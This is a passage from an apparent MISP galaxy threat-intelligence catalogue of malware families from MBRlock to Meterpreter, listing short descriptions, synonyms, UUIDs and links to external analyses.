- https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/ - webarchive
- https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf - webarchive
- https://www.zdnet.com/article/ransomware-gang-publishes-tens-of-gbs-of-internal-data-from-lg-and-xerox/ - webarchive
- https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf - webarchive
- https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/ - webarchive
- https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/ - webarchive
- https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1 - webarchive
- https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/crytek-confirms-egregor-ransomware-attack-customer-data-theft/ - webarchive
- https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/ - webarchive
- https://www.brighttalk.com/webcast/7451/408167/navigating-maze-analysis-of-a-rising-ransomware-threat - webarchive
- https://www.bleepingcomputer.com/news/security/zeus-icedid-malware-gangs-leader-pleads-guilty-faces-40-years-in-prison/ - webarchive
- https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/ - webarchive
- https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide - webarchive
- https://nakedsecurity.sophos.com/2020/06/04/nuclear-missile-contractor-hacked-in-maze-ransomware-attack/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MBRlock
This ransomware modifies the master boot record of the victim's computer so that it shows a ransom note before Windows starts.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MBRlock.
Known Synonyms |
---|
DexLocker |
Internal MISP references
UUID 41177275-7e6d-4ebd-a4df-d2cc733f7791
which can be used as unique global reference for MBRlock
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.mbrlock - webarchive
- https://www.bleepingcomputer.com/news/security/dexcrypt-mbrlocker-demands-30-yuan-to-gain-access-to-computer/ - webarchive
- http://id-ransomware.blogspot.com.tr/2018/02/mbrlock-hax-ransomware.html - webarchive
- https://www.hybrid-analysis.com/sample/dfc56a704b5e031f3b0d2d0ea1d06f9157758ad950483b44ac4b77d33293cb38?environmentId=100 - webarchive
- https://app.any.run/tasks/0a7e643f-7562-4575-b8a5-747bd6b5f02d - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MBR Locker
Ransomware overwriting the system's MBR, making it impossible to boot into Windows.
Internal MISP references
UUID 1f7fc94c-218a-4571-85b6-5667544bf230
which can be used as unique global reference for MBR Locker
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Mebromi
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Mebromi.
Known Synonyms |
---|
MyBios |
Internal MISP references
UUID 342be00c-cf68-45a6-8f90-3a2d2d20bda6
which can be used as unique global reference for Mebromi
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.mebromi - webarchive
- http://www.theregister.co.uk/2011/09/14/bios_rootkit_discovered/ - webarchive
- http://contagiodump.blogspot.com/2011/09/mebromi-bios-rootkit-affecting-award.html - webarchive
- https://www.webroot.com//blog/2011/09/13/mebromi-the-first-bios-rootkit-in-the-wild/ - webarchive
- https://www.symantec.com/connect/blogs/bios-threat-showing-again - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MECHANICAL
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MECHANICAL.
Known Synonyms |
---|
GoldStamp |
Internal MISP references
UUID cd055701-89ad-41be-b4d9-69460876fdee
which can be used as unique global reference for MECHANICAL
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.mechanical - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa20-301a - webarchive
- https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MediaPI
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MediaPI.
Known Synonyms |
---|
Eyeglass |
Internal MISP references
UUID 3c111e49-957c-4bda-8c25-7be3e373b788
which can be used as unique global reference for MediaPI
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Medre
Internal MISP references
UUID 243ae1f7-183e-4ea9-82cf-3353a0ef78f4
which can be used as unique global reference for Medre
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Medusa (Windows)
Medusa is a DDoS bot written in .NET 2.0. In its current incarnation its C&C protocol is based on HTTP, while its predecessor made use of IRC.
Internal MISP references
UUID 237a1c2d-eb14-483d-9a2e-82f10b63ec06
which can be used as unique global reference for Medusa (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.medusa - webarchive
- https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf - webarchive
- https://news.drweb.com/show/?i=10302&lng=en - webarchive
- https://www.arbornetworks.com/blog/asert/medusahttp-ddos-slithers-back-spotlight/ - webarchive
- https://zerophagemalware.com/2017/10/13/rig-ek-via-malvertising-drops-a-miner/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MedusaLocker
A Windows ransomware that will run certain tasks to prepare the target system for the encryption of files. MedusaLocker avoids executable files, probably to avoid rendering the targeted system unusable for paying the ransom. It uses a combination of AES and RSA-2048, and reportedly appends extensions such as .encrypted, .bomber, .boroff, .breakingbad, .locker16, .newlock, .nlocker, and .skynet.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MedusaLocker.
Known Synonyms |
---|
AKO Doxware |
AKO Ransomware |
MedusaReborn |
Internal MISP references
UUID 77e7221f-d3db-4d13-bcde-e6d7a494f424
which can be used as unique global reference for MedusaLocker
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.medusalocker - webarchive
- https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3 - webarchive
- https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf - webarchive
- https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/ - webarchive
- https://www.loginsoft.com/post/medusa-ransomware-evolving-tactics-in-modern-cyber-extortion - webarchive
- https://twitter.com/siri_urz/status/1215194488714346496?s=20 - webarchive
- http://id-ransomware.blogspot.com/2019/10/medusalocker-ransomware.html - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://cloudsek.com/technical-analysis-of-medusalocker-ransomware/ - webarchive
- https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/ - webarchive
- https://www.cisa.gov/uscert/ncas/alerts/aa22-181a - webarchive
- https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1 - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa20-345a - webarchive
- https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/ - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf - webarchive
- https://www.mandiant.com/resources/chasing-avaddon-ransomware - webarchive
- https://medium.com/@shaddy43/decrypting-the-mystery-of-medusalocker-7128795cf9f0 - webarchive
- https://www.theta.co.nz/news-blogs/cyber-security-blog/part-1-analysing-medusalocker-ransomware/ - webarchive
- https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/ - webarchive
- https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/ - webarchive
- https://www.cisa.gov/uscert/sites/default/files/publications/AA22-181A_stopransomware_medusalocker.pdf - webarchive
- https://www.cybereason.com/blog/medusalocker-ransomware - webarchive
- https://blog.cyble.com/2023/03/15/unmasking-medusalocker-ransomware/ - webarchive
- https://www.theta.co.nz/news-blogs/cyber-security-blog/part-3-analysing-medusalocker-ransomware/ - webarchive
- https://dissectingmalwa.re/try-not-to-stare-medusalocker-at-a-glance.html - webarchive
- https://www.theta.co.nz/news-blogs/cyber-security-blog/part-2-analysing-medusalocker-ransomware/ - webarchive
- https://blog.talosintelligence.com/2020/04/medusalocker.html - webarchive
- https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145 - webarchive
- https://asec.ahnlab.com/en/48940/ - webarchive
- https://www.carbonblack.com/2020/06/03/tau-threat-analyis-medusa-locker-ransomware/ - webarchive
- https://id-ransomware.blogspot.com/2020/01/ako-ransomware.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Meduza Stealer
Internal MISP references
UUID 20edd63e-d1a8-4aae-a0a6-50f5bb1cf65f
which can be used as unique global reference for Meduza Stealer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.meduza - webarchive
- https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-meduza-f1bbd2efb84f - webarchive
- https://www.zerofox.com/blog/the-underground-economist-volume-3-issue-12/ - webarchive
- https://cert.gov.ua/article/6276652 - webarchive
- https://russianpanda.com/2023/06/28/Meduza-Stealer-or-The-Return-of-The-Infamous-Aurora-Stealer/ - webarchive
- https://www.fortinet.com/blog/threat-research/exploiting-cve-2024-21412-stealer-campaign-unleashed - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MegaCortex
MegaCortex is ransomware used in targeted attacks against corporations. Once run, it tries to stop security-related services and then starts its own encryption process, appending a .aes128ctr or .megac0rtx extension to the encrypted files. It is typically delivered by downloaders and trojans and has no propagation capabilities of its own.
Internal MISP references
UUID 3f09884e-dddc-4513-8720-a28fe21ab9a8
which can be used as unique global reference for MegaCortex
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.megacortex - webarchive
- https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/ - webarchive
- https://www.bleepingcomputer.com/news/security/bitdefender-releases-free-megacortex-ransomware-decryptor/ - webarchive
- https://www.bleepingcomputer.com/news/security/elusive-megacortex-ransomware-found-here-is-what-we-know/ - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf - webarchive
- https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/ - webarchive
- https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/ - webarchive
- https://www.bleepingcomputer.com/news/security/new-megacortex-ransomware-changes-windows-passwords-threatens-to-publish-data/ - webarchive
- https://news.sophos.com/en-us/2019/05/10/megacortex-deconstructed-mysteries-mount-as-analysis-continues/ - webarchive
- https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf - webarchive
- https://blog.malwarebytes.com/detections/ransom-megacortex/ - webarchive
- https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/ - webarchive
- https://news.sophos.com/en-us/2019/05/03/megacortex-ransomware-wants-to-be-the-one/ - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/ - webarchive
- https://www.bleepingcomputer.com/news/security/fbi-issues-alert-for-lockergoga-and-megacortex-ransomware/ - webarchive
- https://threatpost.com/megacortex-ransomware-mass-distribution/146933/ - webarchive
- https://www.computing.co.uk/ctg/news/3084818/warning-over-lockergoga-and-megacortex-ransomware-attacks-targeting-private-industry-in-western-countries - webarchive
- https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot - webarchive
- https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware - webarchive
- https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure - webarchive
- https://www.trendmicro.com/vinfo/pl/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MegaCreep
Internal MISP references
UUID 394ddd91-b673-4607-b253-fe19b98008b5
which can be used as unique global reference for MegaCreep
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MeguminTrojan
Megumin Trojan is malware that combines several functions (DDoS, miner, loader, clipper).
Internal MISP references
UUID 76cd241a-c265-4a33-8ce7-db2d3647b489
which can be used as unique global reference for MeguminTrojan
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Mekotio
Internal MISP references
UUID bfebb298-66e3-4250-82e8-910b7dd8618c
which can be used as unique global reference for Mekotio
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.mekotio - webarchive
- https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf - webarchive
- https://twitter.com/hpsecurity/status/1509185858146082816 - webarchive
- https://www.welivesecurity.com/2020/08/13/mekotio-these-arent-the-security-updates-youre-looking-for/ - webarchive
- https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam - webarchive
- https://www.microsoft.com/security/blog/2021/11/11/html-smuggling-surges-highly-evasive-loader-technique-increasingly-used-in-banking-malware-targeted-attacks/ - webarchive
- https://research.checkpoint.com/2021/mekotio-banker-returns-with-improved-stealth-and-ancient-encryption/ - webarchive
- https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/rooty-dolphin-uses-mekotio-to-target-bank-clients-in-south-america-and-europe/ - webarchive
- http://www.interior.gob.es/prensa/noticias/-/asset_publisher/GHU8Ap6ztgsg/content/id/13552853 - webarchive
- https://therecord.media/spain-arrests-16-for-distributing-the-mekotio-and-grandoreiro-banking-trojans/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Melcoz
Internal MISP references
UUID e3e289bb-3ac2-4f93-becd-540720501884
which can be used as unique global reference for Melcoz
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MeltingClaw
Internal MISP references
UUID f7b455fb-9774-41d4-8315-75192c3e3f4c
which can be used as unique global reference for MeltingClaw
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Meow
According to PCrisk, MEOW is ransomware based on other ransomware called CONTI. MEOW encrypts files and appends the ".MEOW" extension to their filenames. It also drops the "readme.txt" file (a ransom note). An example of how MEOW ransomware modifies filenames: it renames "1.jpg" to "1.jpg.MEOW", "2.png" to "2.png.MEOW", and so forth.
Internal MISP references
UUID ee27ec81-3c41-4562-ae6b-58a7ce6f0485
which can be used as unique global reference for Meow
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MercurialGrabber
Internal MISP references
UUID 5fa45856-2960-47c4-ad73-df0ff142ae12
which can be used as unique global reference for MercurialGrabber
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Merdoor
Internal MISP references
UUID bf604927-77df-46e5-9bdb-ee9b631461a2
which can be used as unique global reference for Merdoor
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Merlin
Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.
Internal MISP references
UUID 427e4b41-adf6-4d4d-a83f-6d96b5ab4a3e
which can be used as unique global reference for Merlin
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.merlin - webarchive
- http://lockboxx.blogspot.com/2018/02/intro-to-using-gscript-for-red-teams.html - webarchive
- http://lockboxx.blogspot.com/2018/02/merlin-for-red-teams.html - webarchive
- https://github.com/Ne0nd0g/merlin - webarchive
- https://www.securonix.com/blog/threat-labs-security-advisory-new-starkvortex-attack-campaign-threat-actors-use-drone-manual-lures-to-deliver-merlinagent-payloads/ - webarchive
- https://jsac.jpcert.or.jp/archive/2024/pdf/JSAC2024_1_9_takeda_furukawa_en.pdf - webarchive
- https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Mespinoza
Mespinoza is ransomware that encrypts files using asymmetric encryption and appends the .pysa file extension. According to dissectingmalware, the extension "pysa" is probably derived from the Zanzibari coin of the same name.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Mespinoza.
Known Synonyms |
---|
pysa |
Internal MISP references
UUID 68a7ca8e-2902-43f2-ad23-a77b4c48221d
which can be used as unique global reference for Mespinoza
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.mespinoza - webarchive
- https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3 - webarchive
- https://twitter.com/campuscodi/status/1347223969984897026 - webarchive
- https://www.hhs.gov/sites/default/files/mespinoza-goldburlap-cyborgspider-analystnote-tlpwhite.pdf - webarchive
- https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/ - webarchive
- https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf - webarchive
- https://blog.cyble.com/2021/11/29/pysa-ransomware-under-the-lens-a-deep-dive-analysis/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf - webarchive
- https://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/ - webarchive
- https://securelist.com/modern-ransomware-groups-ttps/106824/ - webarchive
- https://www.lacework.com/blog/pysa-ransomware-gang-adds-linux-support/ - webarchive
- https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/ - webarchive
- https://blogs.blackberry.com/en/2021/06/pysa-loves-chachi-a-new-golang-rat - webarchive
- https://www.cert.ssi.gouv.fr/cti/CERTFR-2020-CTI-002/ - webarchive
- https://www.prodaft.com/resource/detail/pysa-ransomware-group-depth-analysis - webarchive
- https://dissectingmalwa.re/another-one-for-the-collection-mespinoza-pysa-ransomware.html - webarchive
- https://twitter.com/inversecos/status/1456486725664993287 - webarchive
- https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/ - webarchive
- https://www.ic3.gov/Media/News/2021/210316.pdf - webarchive
- https://www.zdnet.com/article/france-warns-of-new-ransomware-gang-targeting-local-governments/ - webarchive
- https://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/ - webarchive
- https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/ - webarchive
- https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf - webarchive
- https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html - webarchive
- https://www.cybereason.com/blog/threat-analysis-report-inside-the-destructive-pysa-ransomware - webarchive
- https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/ - webarchive
- https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/ - webarchive
- https://www.bleepingcomputer.com/news/security/ransomware-gangs-script-shows-exactly-the-files-theyre-after/ - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-burlap - webarchive
- https://www.prodaft.com/m/reports/PYSA_TLPWHITE_3.0.pdf - webarchive
- https://id-ransomware.blogspot.com/2019/10/mespinoza-ransomware.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MetadataBin
Ransomware.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MetadataBin.
Known Synonyms |
---|
Ransomware32 |
Internal MISP references
UUID 750c5b2c-1489-4e11-b21d-c49b651d9227
which can be used as unique global reference for MetadataBin
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
METALJACK
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular METALJACK.
Known Synonyms |
---|
denesRAT |
Internal MISP references
UUID 64304fcc-5bc8-4000-9be2-4fc7a482897a
which can be used as unique global reference for METALJACK
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.metaljack - webarchive
- https://m.threatbook.cn/detail/2527 - webarchive
- https://ti.qianxin.com/blog/articles/coronavirus-analysis-of-global-outbreak-related-cyber-attacks/ - webarchive
- https://s.tencent.com/research/report/944.html - webarchive
- https://www.youtube.com/watch?v=ftjDH65kw6E - webarchive
- https://www.fireeye.com/blog/threat-research/2020/04/apt32-targeting-chinese-government-in-covid-19-related-espionage.html - webarchive
- https://blog.viettelcybersecurity.com/apt32-deobfuscation-arsenal-deobfuscating-mot-vai-loai-obfucation-toolkit-cua-apt32-phan-1/ - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2020-1110.pdf - webarchive
- https://www.secrss.com/articles/17900 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Metamorfo
According to BitDefender, Metamorfo is a family of banker Trojans that has been active since mid-2018. It primarily targets Brazilians and is delivered mostly through Office files rigged with macros in spam attachments. Metamorfo is a potent piece of malware, whose primary capability is theft of banking information and other personal data from the user and exfiltration of it to the C2 server.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Metamorfo.
Known Synonyms |
---|
Casbaneiro |
Internal MISP references
UUID 18dc3e7a-600d-4e5f-a283-86156b938530
which can be used as unique global reference for Metamorfo
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.metamorfo - webarchive
- https://www.botconf.eu/wp-content/uploads/2019/12/B2019-Soucek-Hornak-DemystifyingBankingTrojansFromLatinAmerica.pdf - webarchive
- https://www.bitdefender.com/files/News/CaseStudies/study/333/Bitdefender-PR-Whitepaper-Metamorfo-creat4500-en-EN-GenericUse.pdf - webarchive
- https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767 - webarchive
- https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam - webarchive
- https://blog.ensilo.com/metamorfo-avast-abuser - webarchive
- https://twitter.com/MsftSecIntel/status/1418706916922986504 - webarchive
- https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors - webarchive
- https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/metamorfo.md - webarchive
- https://www.welivesecurity.com/2019/10/03/casbaneiro-trojan-dangerou - webarchive
- https://blog.talosintelligence.com/2018/11/metamorfo-brazilian-campaigns.html - webarchive
- https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html - webarchive
- https://cofense.com/blog/autohotkey-banking-trojan/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MetaStealer
On March 7, 2022, KELA observed a threat actor named META announcing the launch of META – a new information-stealing malware, available for sale for USD125 per month or USD1000 for unlimited use. The actor claimed it has the same functionality, code, and panel as the Redline stealer, but with several improvements.
Internal MISP references
UUID 9b7758fc-2fca-4b07-b669-34461fc95a67
which can be used as unique global reference for MetaStealer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.metastealer - webarchive
- https://isc.sans.edu/forums/diary/Windows+MetaStealer+Malware/28522/ - webarchive
- https://medium.com/walmartglobaltech/metastealer-string-decryption-and-dga-overview-5f38f76830cd - webarchive
- https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-meta-8ae628dfab8c - webarchive
- https://russianpanda.com/2023/12/28/MetaStealer-Part-2/ - webarchive
- https://russianpanda.com/2023/11/20/MetaStealer-Redline's-Doppelganger/ - webarchive
- https://www.accenture.com/us-en/blogs/security/information-stealer-malware-on-dark-web - webarchive
- https://research.nccgroup.com/2022/05/20/metastealer-filling-the-racoon-void/ - webarchive
- https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem - webarchive
- https://ke-la.com/information-stealers-a-new-landscape/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Meteor
A wiper used in an attack against the Iranian train system.
Internal MISP references
UUID 066250ee-9279-47ad-b289-e266ede11921
which can be used as unique global reference for Meteor
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.meteor - webarchive
- https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/ - webarchive
- https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll/ - webarchive
- https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/ - webarchive
- https://threatpost.com/novel-meteor-wiper-used-in-attack-that-crippled-iranian-train-system/168262/ - webarchive
- https://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/ - webarchive
- https://twitter.com/cpresearch/status/1541753913732366338 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Meterpreter (Windows)
Internal MISP references
UUID 13a5c0ae-8e2d-4a38-8b6c-7d746e159991
which can be used as unique global reference for Meterpreter (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.meterpreter - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-franklin - webarchive
- https://blog.morphisec.com/fin7-attacks-restaurant-industry - webarchive
- https://blog.talosintelligence.com/2022/05/mustang-panda-targets-europe.html - webarchive
- https://securelist.com/shedding-skin-turlas-fresh-faces/88069/ - webarchive
- https://www.cynet.com/attack-techniques-hands-on/threats-looming-over-the-horizon/ - webarchive
- https://www.cisa.gov/sites/default/files/2023-09/aa23-250a-apt-actors-exploit-cve-2022-47966-and-cve-2022-42475.pdf - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a - webarchive
- https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine - webarchive
- https://asec.ahnlab.com/ko/26705/ - webarchive
- https://asec.ahnlab.com/en/53046/ - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services - webarchive
- https://asec.ahnlab.com/en/56236/ - webarchive
- https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/ - webarchive
- https://www.recordedfuture.com/chinese-group-calypso-exploiting-microsoft-exchange/ - webarchive
- https://www.cybereason.com/blog/threat-analysis-report-abusing-notepad-plugins-for-evasion-and-persistence - webarchive
- https://redcanary.com/blog/getsystem-offsec/ - webarchive
- https://cybleinc.com/2020/11/17/oceanlotus-continues-with-its-cyber-espionage-operations/ - webarchive
- https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass - webarchive
- https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023 - webarchive
- https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf - webarchive
- https://explore.group-ib.com/htct/hi-tech_crime_2018 - webarchive
- https://thedfirreport.com/2022/09/26/bumblebee-round-two/ - webarchive
- https://unit42.paloaltonetworks.com/atoms/obscureserpens/ - webarchive
- https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf - webarchive
- https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis - webarchive
- https://news.sophos.com/en-us/2021/06/02/amsi-bypasses-remain-tricks-of-the-malware-trade/ - webarchive
- http://schierlm.users.sourceforge.net/avevasion.html - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa20-301a - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/chasing-currents-espionage-south-china-sea - webarchive
